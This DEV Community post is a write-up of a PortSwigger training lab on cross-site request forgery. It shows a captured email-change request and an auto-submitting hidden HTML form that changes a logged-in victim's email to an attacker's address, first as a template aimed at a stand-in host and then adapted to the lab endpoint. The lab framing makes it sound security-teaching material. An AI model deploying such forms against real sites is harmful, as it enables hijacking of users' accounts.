Forem

Cover image for Portswigger’s lab write up: CSRF vulnerability with no defenses
Christian Paez
Christian Paez

Posted on • Edited on

3 2

Portswigger’s lab write up: CSRF vulnerability with no defenses

In this apprentice-level lab, we will exploit a site that contains a CSRF vulnerability in its email change functionality.

After signing in  and trying to update our account's email to something like 'test@gmail.com', we can see the following request in the Network tab of our browser or Burpsuite Intercept:

POST /my-account/change-email HTTP/1.1
Host: [0a9a0027047d6aaec1fa58be003b00b3.web-security-academy.net](<http://0a9a0027047d6aaec1fa58be003b00b3.web-security-academy.net/>)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: [<https://0a9a0027047d6aaec1fa58be003b00b3.web-security-academy.net>](<https://0a9a0027047d6aaec1fa58be003b00b3.web-security-academy.net/>)
Connection: keep-alive
Referer: [<https://0a9a0027047d6aaec1fa58be003b00b3.web-security-academy.net/my-account>](<https://0a9a0027047d6aaec1fa58be003b00b3.web-security-academy.net/my-account>)
Cookie: session=bQKVomOrYf95eVTuf4XKAw9zlJQDsUUK
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Enter fullscreen mode Exit fullscreen mode

With the following body structure:

email=test@gmail.com
Enter fullscreen mode Exit fullscreen mode

Here we are able to identify that the update email action just requires a session cookie to authorize the user and the email parameter to execute this action. Let's use the reading material's HTML template for CSRF to build our attack:

<html>
    <body>
        <form action="<https://vulnerable-website.com/email/change>" method="POST">
            <input type="hidden" name="email" value="pwned@evil-user.net" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>
Enter fullscreen mode Exit fullscreen mode

All we need to do is replace the action attribute of the form component to our lab's absolute email update endpoint (you can see it on the POST request we performed earlier) and the value attribute of the email input to whatever value we want the victim's email to change to:

<html>
    <body>
        <form action="{LAB URL}/my-account/change-email" method="POST">
            <input type="hidden" name="email" value="attacker@gmail.com" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>
Enter fullscreen mode Exit fullscreen mode

If we save this as an HTML file, when someone visits our site, the form above will be submitted as soon as the page loads and an email update will be requested (as long as the user is authenticated on the lab's site since a session cookie is required to perform the email update action). To solve the lab, we have to go to the exploit server, store our HTML code, and send it to the victim.

Check out this write up on the Art Of Code: https://artofcode.tech/portswiggers-lab-write-up-csrf-vulnerability-with-no-defenses/
Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/csrf/csrf-vulnerability-with-no-defenses

Image of Timescale

🚀 pgai Vectorizer: SQLAlchemy and LiteLLM Make Vector Search Simple

We built pgai Vectorizer to simplify embedding management for AI applications—without needing a separate database or complex infrastructure. Since launch, developers have created over 3,000 vectorizers on Timescale Cloud, with many more self-hosted.

Read full post →

Top comments (0)

Image of Docusign

🛠️ Bring your solution into Docusign. Reach over 1.6M customers.

Docusign is now extensible. Overcome challenges with disconnected products and inaccessible data by bringing your solutions into Docusign and publishing to 1.6M customers in the App Center.

Learn more

👋 Kindness is contagious

Explore a sea of insights with this enlightening post, highly esteemed within the nurturing DEV Community. Coders of all stripes are invited to participate and contribute to our shared knowledge.

Expressing gratitude with a simple "thank you" can make a big impact. Leave your thanks in the comments!

On DEV, exchanging ideas smooths our way and strengthens our community bonds. Found this useful? A quick note of thanks to the author can mean a lot.

Okay